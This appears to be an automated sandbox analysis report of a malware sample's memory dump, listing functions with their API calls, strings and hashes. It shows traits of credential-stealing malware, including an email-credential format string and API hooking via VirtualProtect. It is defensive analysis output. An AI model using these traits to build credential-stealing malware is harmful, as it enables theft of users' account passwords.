Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: 10091adf37cde436a8274ff25ca49d61a967aa7d59274b835ac283220fcda28f
Instruction ID: f73462884269dd5539fd784514e5a28753bde5a098bfa75d2b3f4a5f9e6817cf
Opcode Fuzzy Hash: 10091adf37cde436a8274ff25ca49d61a967aa7d59274b835ac283220fcda28f
Instruction Fuzzy Hash: 0E110131145358BBD2322BA1AC8CF6F3E5DEB51761F100126F60199AE2EB728894C6A0

Uniqueness

Uniqueness Score: 100.00%

Function 001D61E9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D0FAF: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001D6203,253D7325,77A381D0,00000000,00000000,?,?,001D0B24), ref: 001D1016
Part of subcall function 001D0FAF: sprintf.NTDLL ref: 001D1037

lstrlen.KERNEL32(00000000,253D7325,77A381D0,00000000,00000000,?,?,001D0B24,?,03E58D60), ref: 001D6214
lstrlen.KERNEL32(?,?,?,001D0B24,?,03E58D60), ref: 001D621C

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

strcpy.NTDLL ref: 001D6233
lstrcat.KERNEL32(00000000,?), ref: 001D623E

Part of subcall function 001D4699: lstrlen.KERNEL32(?,?,001D0B24,001D0B24,00000001,00000000,00000000,?,001D624D,00000000,001D0B24,?,?,001D0B24,?,03E58D60), ref: 001D46B0

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,001D0B24,?,?,001D0B24,?,03E58D60), ref: 001D625B

Part of subcall function 001DF795: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,001D6267,00000000,?,?,001D0B24,?,03E58D60), ref: 001DF79F
Part of subcall function 001DF795: _snprintf.NTDLL ref: 001DF7FD

Strings

=, xrefs: 001D6255

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: fe7b4ece7a3c6a3fe507e2e0b41fda5a1016230c433a2de8bbf52c8208ebb457
Instruction ID: f1af769a4682d70ac7427c9a3880c286e71c367aaf6127f394316f158af633c7
Opcode Fuzzy Hash: fe7b4ece7a3c6a3fe507e2e0b41fda5a1016230c433a2de8bbf52c8208ebb457
Instruction Fuzzy Hash: F211E537900625778B12BBB89C8ACAF37BD9FA9760315451AF5059B302DF38DE0297B1

Uniqueness

Uniqueness Score: 100.00%

Function 001D5DB8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68memoryUNIQUE

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,?,?,CrHook,?,?,?,001C8416,779F5520,001C6A04,?), ref: 001D5DEF
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,001C8416,779F5520,001C6A04,?), ref: 001D5E1F
RtlEnterCriticalSection.NTDLL(001E6340), ref: 001D5E2E
RtlLeaveCriticalSection.NTDLL(001E6340), ref: 001D5E4C
GetLastError.KERNEL32(?,001C8416,779F5520,001C6A04,?), ref: 001D5E5C

Strings

CrHook, xrefs: 001D5DBD

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID: CrHook
API String ID: 653387826-2654099897
Opcode ID: 25c6fd96318d8e307b4b50961593159e35f401423c296e4a1de1ea2fa9ed4518
Instruction ID: c3fec5fd1a2b3e0616d62eb1bf691b3c3763a7c799ddd65ce9802925dceabd4a
Opcode Fuzzy Hash: 25c6fd96318d8e307b4b50961593159e35f401423c296e4a1de1ea2fa9ed4518
Instruction Fuzzy Hash: FF21E7B5600B05AFC720DFA9C985A5ABBF8FB18710B004529E65A97B50D770FA44DBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001D4BBE, Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,001D7E0D), ref: 001D4BE9
CloseHandle.KERNEL32(?,?,001D7E0D), ref: 001D4BF5
CloseHandle.KERNEL32(00000000,77A4F720,?,001C78CA,00000000,?,?,?,001D7E0D), ref: 001D4C07
memset.NTDLL ref: 001D4C1E
memset.NTDLL ref: 001D4C35
memset.NTDLL ref: 001D4C4C
memset.NTDLL ref: 001D4C63

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memset$CloseHandle$SwitchThread
String ID:
API String ID: 3699883640-0
Opcode ID: d8606e075a24c4458b3ee1d912b46e02a1844ebfc5e988d45a09004cd3124b18
Instruction ID: ce2723acbeb3b0cb39a1a717227224b7fddbe94210b4295e573941337b13fe3c
Opcode Fuzzy Hash: d8606e075a24c4458b3ee1d912b46e02a1844ebfc5e988d45a09004cd3124b18
Instruction Fuzzy Hash: 9411CA719015A4A7C62277666C86F4F3A6C9FF2750B44002DF400AB6A3CBB5CD81C7B5

Uniqueness

Uniqueness Score: 3.32%

Function 001C4B45, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4B76
wcstombs.NTDLL ref: 001C4B87

Part of subcall function 001D427A: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,001C4B9D,00000000), ref: 001D428C
Part of subcall function 001D427A: StrChrA.SHLWAPI(?,?,?,?,00000000,001C4B9D,00000000), ref: 001D429B

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 001C4BA8
TerminateProcess.KERNEL32(00000000,00000000), ref: 001C4BB7
CloseHandle.KERNEL32(00000000), ref: 001C4BBE
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C4BCD
WaitForSingleObject.KERNEL32(00000000), ref: 001C4BDD

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 7d2cdd2760aa0ad9772e3fd7e61a0ee6f8591483221b9bacadadc956024f5297
Instruction ID: 45e8144b4db96236909c66f7088bfd167140230f70a4cc58f4aea8154f083f63
Opcode Fuzzy Hash: 7d2cdd2760aa0ad9772e3fd7e61a0ee6f8591483221b9bacadadc956024f5297
Instruction Fuzzy Hash: 9811CE31100655BBD7219F94EC98FAEBBADFF14765F104014F905AA9E0C7B1ED90CBA1

Uniqueness

Uniqueness Score: 2.48%

Function 001CD13C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,000000FF,?,?,001CF5E9,?,00000000), ref: 001CD157
lstrlen.KERNEL32( | "%s" | %u,?,?,001CF5E9,?,00000000), ref: 001CD162
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 001CD173

Part of subcall function 001DD525: GetLocalTime.KERNEL32(?,?,?,?,?,001C23AF,00000000,00000001), ref: 001DD52F
Part of subcall function 001DD525: wsprintfA.USER32 ref: 001DD562

wsprintfA.USER32 ref: 001CD196

Part of subcall function 001C52C9: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001CD1BE,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 001C52E7
Part of subcall function 001C52C9: wsprintfA.USER32 ref: 001C5305

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 001CD1C7

Strings

| "%s" | %u, xrefs: 001CD159, 001CD15E, 001CD191

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 3847261958-3278422759
Opcode ID: e23606563db123d5e847ed3b523c2f28977fb56695ca993da2073a6d3d6af917
Instruction ID: 8cd7cf96488b0c1ffd44dcd61d46a420d217c133b5cdd0693135c3c3d23fe012
Opcode Fuzzy Hash: e23606563db123d5e847ed3b523c2f28977fb56695ca993da2073a6d3d6af917
Instruction Fuzzy Hash: AD11C631500118BFDB11AFA5DC84D6E7BBEEB84398B104026F9049B561E7319E51DBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001D11D3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

lstrcpy.KERNEL32(-000000FC,00000000), ref: 001D120D
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001D121F
GetTickCount.KERNEL32 ref: 001D122A
GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D1236
lstrcpy.KERNEL32(00000000), ref: 001D1250

Strings

\Low, xrefs: 001D11FF

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 7e055174a99ffda677ce4ebdf2f5d835c0fb97f42c27ca422cacaec74a6787a8
Instruction ID: 72a61d94cc4930fb168c1bc3f8346d5ac28bde79c29a98b5e78cceb74740d4f5
Opcode Fuzzy Hash: 7e055174a99ffda677ce4ebdf2f5d835c0fb97f42c27ca422cacaec74a6787a8
Instruction Fuzzy Hash: 800122312016A4BBE3106BB49CC8F6FB79DEF51762F250026F111DB291DB25E800C6B5

Uniqueness

Uniqueness Score: 100.00%

Function 001C8CB1, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,Main), ref: 001C8CD2
RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C8CE4
RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C8CF7
lstrcmpi.KERNEL32(001E6380,00000000), ref: 001C8D18
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001DABF4,00000000), ref: 001C8D2C

Strings

Main, xrefs: 001C8CCA

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: Main
API String ID: 1266740956-521822810
Opcode ID: 4bcd54088aeb0abfd314802df9d8459b4b3453013bd93c3237c9225a0c5a210b
Instruction ID: 6c2375c1495120fb04989769652e67c81befa9ab37071aecab60ebbaaca81ea6
Opcode Fuzzy Hash: 4bcd54088aeb0abfd314802df9d8459b4b3453013bd93c3237c9225a0c5a210b
Instruction Fuzzy Hash: A1119671500249EFCB04CF99D989F9DB7A8FF64365B04411DE509A7690CB74DD40CB90

Uniqueness

Uniqueness Score: 2.04%

Function 001D4FC6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 001D4FDD

Part of subcall function 001C5EB3: WaitForSingleObject.KERNEL32(00000000,00000000,00004000,?,?,?,?,001D4FEF,?,?,?,001CA9BE,?,?), ref: 001C5ECA
Part of subcall function 001C5EB3: SetEvent.KERNEL32(00000000,?,?,?,001D4FEF,?,?,?,001CA9BE,?,?), ref: 001C5EDA

lstrlen.KERNEL32(?,?,?,?,?,001CA9BE,?,?), ref: 001D5000
lstrlen.KERNEL32(?,?,?,?,001CA9BE,?,?), ref: 001D500A
memcpy.NTDLL(?,?,00004000,?,?,001CA9BE,?,?), ref: 001D501B
HeapFree.KERNEL32(00000000,?,?,?,?,001CA9BE,?,?), ref: 001D503D

Strings

Access-Control-Allow-Origin:, xrefs: 001D4FCB

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
String ID: Access-Control-Allow-Origin:
API String ID: 442095154-3194369251
Opcode ID: 5a764b4a1b9afa614c75b9e8ef6e200988721d6bd56c07d9bb8ca14c33a7d227
Instruction ID: f989b7a1bc977a3d80a06e6f27e17dfd201b6cc03ee35194fc9b0bbe90c05c10
Opcode Fuzzy Hash: 5a764b4a1b9afa614c75b9e8ef6e200988721d6bd56c07d9bb8ca14c33a7d227
Instruction Fuzzy Hash: 2C117971600604BFCB219F94DC85E5EBBBAEB99360F208029F905A6260D7719E40DB60

Uniqueness

Uniqueness Score: 100.00%

Function 001DB086, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D5854: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,001C1CCA,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D5863
Part of subcall function 001D5854: mbstowcs.NTDLL ref: 001D587F

lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,001C761D,?), ref: 001DB0AB
RtlAllocateHeap.NTDLL(00000000,?), ref: 001DB0BD
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C761D,?), ref: 001DB0DA
lstrlenW.KERNEL32(00000000,?,?,001C761D,?), ref: 001DB0E6
HeapFree.KERNEL32(00000000,00000000,?,?,001C761D,?), ref: 001DB0FA

Strings

%APPDATA%\Microsoft\, xrefs: 001DB08B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: %APPDATA%\Microsoft\
API String ID: 3403466626-2699254172
Opcode ID: 4ef0d3976d4139185b02f0638c143940480449871397f69dba8d3a983d20604a
Instruction ID: 1285ee8afaaf03189d832bcad3d46b4fadb8c9426dd8e9af00012030a462309a
Opcode Fuzzy Hash: 4ef0d3976d4139185b02f0638c143940480449871397f69dba8d3a983d20604a
Instruction Fuzzy Hash: 7701BC72201648BFD7119B98DCC5F9E7BACEF05314F100011F6019B2A0CBB09D80CBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001CD9D0, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 208stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000104,?,?,?,00000104,?,?,?,00000104,?,?,?), ref: 001CDAE7
lstrlen.KERNEL32(?,?,?,?,00000104,?,?,?,00000104,?,?,?,00000104,?,?,?), ref: 001CDAF5

Part of subcall function 001DDE8F: lstrlen.KERNEL32(?,00000104,?,00000000,001CDACD,?,?,?,?,?,00000104,?,?,?,00000104), ref: 001DDE9A
Part of subcall function 001DDE8F: lstrcpy.KERNEL32(00000000,?), ref: 001DDEB6

Strings

POP3, xrefs: 001CDB8B, 001CDBA4
IMAP, xrefs: 001CDB92
SMTP, xrefs: 001CDB7D
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 001CDBA5

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: IMAP$POP3$SMTP$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 805584807-1010173016
Opcode ID: 8837ac8b049d9e155e1ef9ae869562482eae7a06f65e20f8f683fee0205a3d36
Instruction ID: 4ed292cd1404adda12080da658a8a5ac234d5739d254cdb48ae2ac69306ca23d
Opcode Fuzzy Hash: 8837ac8b049d9e155e1ef9ae869562482eae7a06f65e20f8f683fee0205a3d36
Instruction Fuzzy Hash: D8712571900119ABCF15DFA5E885EEEBBB8AF29704F02416EF905A7201D734DE50CFA1

Uniqueness

Uniqueness Score: 2.38%

Function 001CBB20, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

GetLastError.KERNEL32(?,?,?,00001000), ref: 001CBBA1
WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 001CBC26
CloseHandle.KERNEL32(00000000), ref: 001CBC40
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 001CBC75

Part of subcall function 001E0072: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,001C538D), ref: 001E0082

WaitForSingleObject.KERNEL32(?,00000064), ref: 001CBCF7
CloseHandle.KERNEL32(?), ref: 001CBD1E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: fee1e8885d421212a73edf3aa2c8e926d89afcffa8162a0dc7a83e962a7a3958
Instruction ID: 2135d95f9ffd67ec02c53f381ac58f95232d04b8bfbc70230ff5cdd4600ce16d
Opcode Fuzzy Hash: fee1e8885d421212a73edf3aa2c8e926d89afcffa8162a0dc7a83e962a7a3958
Instruction Fuzzy Hash: 2C810171904219EFDB11CF98C982BAEBBB5FF28700F248459E915EB251C730EE40DBA4

Uniqueness

Uniqueness Score: 100.00%

Function 001C8E14, Relevance: 9.1, APIs: 6, Instructions: 122threadUNIQUE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?), ref: 001C8E6F
GetLastError.KERNEL32(?), ref: 001C8E95
SetEvent.KERNEL32(00000000,?), ref: 001C8EA8
GetModuleHandleA.KERNEL32(00000000), ref: 001C8EF1
memset.NTDLL ref: 001C8F06
RtlExitUserThread.NTDLL(?,?), ref: 001C8F3B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HandleModule$ErrorEventExitLastThreadUsermemset
String ID:
API String ID: 3978817377-0
Opcode ID: 90876109bebfa5c4ff4a807b8ca1e1eab833461141b869d89a277cac676a7bf5
Instruction ID: 18e16f2e9bad13c18c297d79dae21ad3984c0019754615559738ae42f90ce006
Opcode Fuzzy Hash: 90876109bebfa5c4ff4a807b8ca1e1eab833461141b869d89a277cac676a7bf5
Instruction Fuzzy Hash: 564126B1900608AFCB209FA9DDC8DAEBBBEFB95714764051DF902D6550DB70EE44CB60

Uniqueness

Uniqueness Score: 100.00%

Function 001C8A28, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa47d7107a15581e83fd8979dbf1771b4c86a167c5e9bc77e003edefb6bbfc90
Instruction ID: 91f9357d90d60d97aa4e947c27e2a0baa9e745a9c2c43b17fcb6064fbec6ed9d
Opcode Fuzzy Hash: fa47d7107a15581e83fd8979dbf1771b4c86a167c5e9bc77e003edefb6bbfc90
Instruction Fuzzy Hash: B041A0B2500744AFC7209F698CC5F1AB7A9BBA4764B110A2EF266C6590DB70ED44CB51

Uniqueness

Uniqueness Score: 0.00%

Function 001DE29E, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001C84A5,?,001E2638,00000018,001D1CC8,?,00000201,001E5A1C,001E59D4,?,CrHook), ref: 001DE2E1
VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,?,001C84A5,?,001E2638,00000018,001D1CC8), ref: 001DE36C
RtlEnterCriticalSection.NTDLL(001E6340), ref: 001DE394
RtlLeaveCriticalSection.NTDLL(001E6340), ref: 001DE3B2

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: de4aaf624a4f56c492f713cf614b2a3018bdea22febe9627e6fc37d2d433c0da
Instruction ID: e8b467942c26719f08ac8233030b99b3baab957bf307460476da261390a457f4
Opcode Fuzzy Hash: de4aaf624a4f56c492f713cf614b2a3018bdea22febe9627e6fc37d2d433c0da
Instruction Fuzzy Hash: ED415871900655EFCB10EFA5C884AAEBBF8FF58311B10852AE515EB760D770EA41CFA0

Uniqueness

Uniqueness Score: 0.73%

Function 001CE345, Relevance: 9.1, APIs: 6, Instructions: 104UNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

memset.NTDLL ref: 001CE390
RtlEnterCriticalSection.NTDLL(?), ref: 001CE408
RtlLeaveCriticalSection.NTDLL(?), ref: 001CE420
GetLastError.KERNEL32(001CDC47,?,?), ref: 001CE438
RtlEnterCriticalSection.NTDLL(?), ref: 001CE444
RtlLeaveCriticalSection.NTDLL(?), ref: 001CE453

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
String ID:
API String ID: 2000578454-0
Opcode ID: 86ba4d16e3dab024317fee0ffc27bdbf5e38680bb0fafc38e7d20856bf4769ad
Instruction ID: d574d3b506b24c03f1d4206e32a14e8d892c5dde890dbc0f1355ac80112d4e98
Opcode Fuzzy Hash: 86ba4d16e3dab024317fee0ffc27bdbf5e38680bb0fafc38e7d20856bf4769ad
Instruction Fuzzy Hash: 7C4147B1900705EFDB20DFA5C885BAEBBF8BF18750F10852DE949D6680D774EA44CB90

Uniqueness

Uniqueness Score: 100.00%

Function 001C9D5C, Relevance: 9.1, APIs: 6, Instructions: 91timememoryUNIQUE

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C9D76
CreateWaitableTimerA.KERNEL32(001E6114,?,?), ref: 001C9D93
GetLastError.KERNEL32(?,?), ref: 001C9DA4

Part of subcall function 001C7B8F: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
Part of subcall function 001C7B8F: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
Part of subcall function 001C7B8F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
Part of subcall function 001C7B8F: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 001C9DE4
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 001C9E03
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 001C9E19

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: 06f4d078d4c4a8867cd14e1151a7d291644562c3b92e0027a7b5d9ed1684840c
Instruction ID: c9153fa310ed552993d3afd4caf088114f6548e5b45638ce875d269bda0ab2f2
Opcode Fuzzy Hash: 06f4d078d4c4a8867cd14e1151a7d291644562c3b92e0027a7b5d9ed1684840c
Instruction Fuzzy Hash: 7A31E5B2900248EB8F21DF95CC8DDAFBBB9EBA5750B248059F505A7151E7349E84CBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001D5FDC, Relevance: 9.1, APIs: 6, Instructions: 74memoryUNIQUE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 001D601B
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001D602C
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 001D6047
GetLastError.KERNEL32 ref: 001D605D
HeapFree.KERNEL32(00000000,?), ref: 001D606F
HeapFree.KERNEL32(00000000,?), ref: 001D6084

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: dbcdcde6806fb869ecaa7c768355f751ceff95024d3b1058e8358ca7f12ecd4b
Instruction ID: 656eb352797601e939c4323f56169291ae167f28dcb9f320f9de4c46d34e81e5
Opcode Fuzzy Hash: dbcdcde6806fb869ecaa7c768355f751ceff95024d3b1058e8358ca7f12ecd4b
Instruction Fuzzy Hash: 71110A76901028BBCF225BE5DC88CEF7F7EEF453A0B104462F605A55A1C7754A91EBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001DBE37, Relevance: 9.1, APIs: 6, Instructions: 72stringfileUNIQUE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 001DBE4D
lstrcmpiW.KERNEL32(00000000,0065002E,?,?,?,001D22EA), ref: 001DBE77
lstrlenW.KERNEL32(?,?,?,?,001D22EA), ref: 001DBE82
CloseHandle.KERNEL32(?,?,?,?,001D22EA), ref: 001DBEAA
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001D22EA), ref: 001DBED6
RtlLeaveCriticalSection.NTDLL(00000000), ref: 001DBEF3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterFileHandleLeavelstrcmpilstrlen
String ID:
API String ID: 2271926965-0
Opcode ID: be35459d24bf9f53f20a24cba587a0d13f5049ce673fc548540f32f85418c71d
Instruction ID: c18cce1fc3bad1bb19fe76cef2ef93a2df694edb07c924a58ca2f6c2c4c2e40a
Opcode Fuzzy Hash: be35459d24bf9f53f20a24cba587a0d13f5049ce673fc548540f32f85418c71d
Instruction Fuzzy Hash: 48216A31504604EFDB219BA2DCC9EBF77BDEF94B04B11401AFA02A7650EB30EA41DB60

Uniqueness

Uniqueness Score: 100.00%

